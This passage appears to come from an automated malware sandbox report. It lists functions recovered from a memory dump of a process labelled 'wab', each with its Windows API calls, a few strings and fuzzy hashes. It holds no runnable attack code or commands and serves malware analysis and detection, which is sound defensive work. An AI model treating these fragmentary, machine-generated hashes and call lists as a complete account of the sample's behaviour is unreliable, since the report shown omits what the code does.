                                                                                              Function 00412018 Relevance: 6.1, APIs: 4, Instructions: 99windowkeyboardCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 00412057
                                                                                                • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                                                                              • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                                              • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                                              • GetKeyState.USER32(00000010), ref: 0041210D
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                                              • String ID:
                                                                                              • API String ID: 3550944819-0
                                                                                              • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                              • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                                                              • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                              • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040A8D0 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • wcslen.MSVCRT ref: 0040A8E2
                                                                                                • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                                                                                • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                                                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                                                              • memcpy.MSVCRT ref: 0040A94F
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??3@$memcpy$mallocwcslen
                                                                                              • String ID:
                                                                                              • API String ID: 3023356884-0
                                                                                              • Opcode ID: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                                                                              • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                                                                              • Opcode Fuzzy Hash: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                                                                              • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040B1D1 Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • wcslen.MSVCRT ref: 0040B1DE
                                                                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040B201
                                                                                                • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                                                                                • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                                                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040B224
                                                                                              • memcpy.MSVCRT ref: 0040B248
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??3@$memcpy$mallocwcslen
                                                                                              • String ID:
                                                                                              • API String ID: 3023356884-0
                                                                                              • Opcode ID: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                                                              • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                                                              • Opcode Fuzzy Hash: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                                                              • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0041298C Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpy
                                                                                              • String ID: @
                                                                                              • API String ID: 3510742995-2766056989
                                                                                              • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                              • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                                                                              • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                              • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040AED2 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??2@??3@memcpymemset
                                                                                              • String ID:
                                                                                              • API String ID: 1865533344-0
                                                                                              • Opcode ID: 63ad74f41b12567b58218fea097aeaefd91ee3ffeae00ec4d641ec9fdbd265cd
                                                                                              • Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
                                                                                              • Opcode Fuzzy Hash: 63ad74f41b12567b58218fea097aeaefd91ee3ffeae00ec4d641ec9fdbd265cd
                                                                                              • Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040B0D1 Relevance: 6.1, APIs: 4, Instructions: 55stringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • strlen.MSVCRT ref: 0040B0D8
                                                                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040B0FB
                                                                                                • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                                                                                • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                                                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040B12C
                                                                                              • memcpy.MSVCRT ref: 0040B159
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??3@$memcpy$mallocstrlen
                                                                                              • String ID:
                                                                                              • API String ID: 1171893557-0
                                                                                              • Opcode ID: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                                                              • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                                                              • Opcode Fuzzy Hash: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                                                              • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004144BB Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 004144E7
                                                                                                • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                                                • Part of subcall function 0040A353: memcpy.MSVCRT ref: 0040A3A8
                                                                                              • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                                              • memset.MSVCRT ref: 0041451A
                                                                                              • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                              • String ID:
                                                                                              • API String ID: 1127616056-0
                                                                                              • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                              • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                                                              • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                              • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0042FE8B Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 55COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpy$memset
                                                                                              • String ID: sqlite_master
                                                                                              • API String ID: 438689982-3163232059
                                                                                              • Opcode ID: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                                                                              • Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
                                                                                              • Opcode Fuzzy Hash: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                                                                              • Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00414D8A Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                                                                              • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                                                                              • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                                                                              • wcscpy.MSVCRT ref: 00414DF3
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                                              • String ID:
                                                                                              • API String ID: 3917621476-0
                                                                                              • Opcode ID: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                                                                              • Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
                                                                                              • Opcode Fuzzy Hash: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                                                                              • Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00410FB4 Relevance: 6.0, APIs: 4, Instructions: 50windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                                                              • _snwprintf.MSVCRT ref: 00410FE1
                                                                                              • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                                                                                • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                              • _snwprintf.MSVCRT ref: 0041100C
                                                                                              • wcscat.MSVCRT ref: 0041101F
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                                                              • String ID:
                                                                                              • API String ID: 822687973-0
                                                                                              • Opcode ID: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                                                                              • Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
                                                                                              • Opcode Fuzzy Hash: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                                                                              • Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00417434 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,74DEDF80,?,0041755F,?), ref: 00417452
                                                                                              • malloc.MSVCRT ref: 00417459
                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,74DEDF80,?,0041755F,?), ref: 00417478
                                                                                              • ??3@YAXPAX@Z.MSVCRT ref: 0041747F
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide$??3@malloc
                                                                                              • String ID:
                                                                                              • API String ID: 4284152360-0
                                                                                              • Opcode ID: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                                              • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                                                              • Opcode Fuzzy Hash: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                                              • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004123E2 Relevance: 6.0, APIs: 4, Instructions: 47registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                                                                              • RegisterClassW.USER32(?), ref: 00412428
                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                                              • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: HandleModule$ClassCreateRegisterWindow
                                                                                              • String ID:
                                                                                              • API String ID: 2678498856-0
                                                                                              • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                              • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                                                              • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                              • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00409B32 Relevance: 6.0, APIs: 4, Instructions: 47windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,?), ref: 00409B40
                                                                                              • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                                                                              • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                                                                              • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Item
                                                                                              • String ID:
                                                                                              • API String ID: 3888421826-0
                                                                                              • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                              • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                                                                                              • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                              • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00417B5E Relevance: 6.0, APIs: 4, Instructions: 45fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 00417B7B
                                                                                              • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                                                                              • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                                                                              • GetLastError.KERNEL32 ref: 00417BB5
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$ErrorLastLockUnlockmemset
                                                                                              • String ID:
                                                                                              • API String ID: 3727323765-0
                                                                                              • Opcode ID: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                                                              • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                                                                                              • Opcode Fuzzy Hash: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                                                              • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004173E4 Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                                              • malloc.MSVCRT ref: 00417407
                                                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                                              • ??3@YAXPAX@Z.MSVCRT ref: 00417425
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide$??3@malloc
                                                                                              • String ID:
                                                                                              • API String ID: 4284152360-0
                                                                                              • Opcode ID: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                                              • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                                                              • Opcode Fuzzy Hash: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                                              • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040F64E Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0040F673
                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                                                                              • strlen.MSVCRT ref: 0040F6A2
                                                                                              • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                              • String ID:
                                                                                              • API String ID: 2754987064-0
                                                                                              • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                              • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                                                              • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                              • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040F6BD Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0040F6E2
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                                                                              • strlen.MSVCRT ref: 0040F70D
                                                                                              • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                              • String ID:
                                                                                              • API String ID: 2754987064-0
                                                                                              • Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                              • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                                                              • Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                              • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00402FB2 Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 00402FD7
                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                                                                              • strlen.MSVCRT ref: 00403006
                                                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                              • String ID:
                                                                                              • API String ID: 2754987064-0
                                                                                              • Opcode ID: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                                                              • Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
                                                                                              • Opcode Fuzzy Hash: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                                                              • Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0041437B Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                                                • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                                                • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                                              • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                                              • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                                              • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                                              • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                                              • String ID:
                                                                                              • API String ID: 764393265-0
                                                                                              • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                              • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                                                              • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                              • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040A751 Relevance: 6.0, APIs: 4, Instructions: 34timeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                                                              • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                                                              • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: Time$System$File$LocalSpecific
                                                                                              • String ID:
                                                                                              • API String ID: 979780441-0
                                                                                              • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                              • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                                                              • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
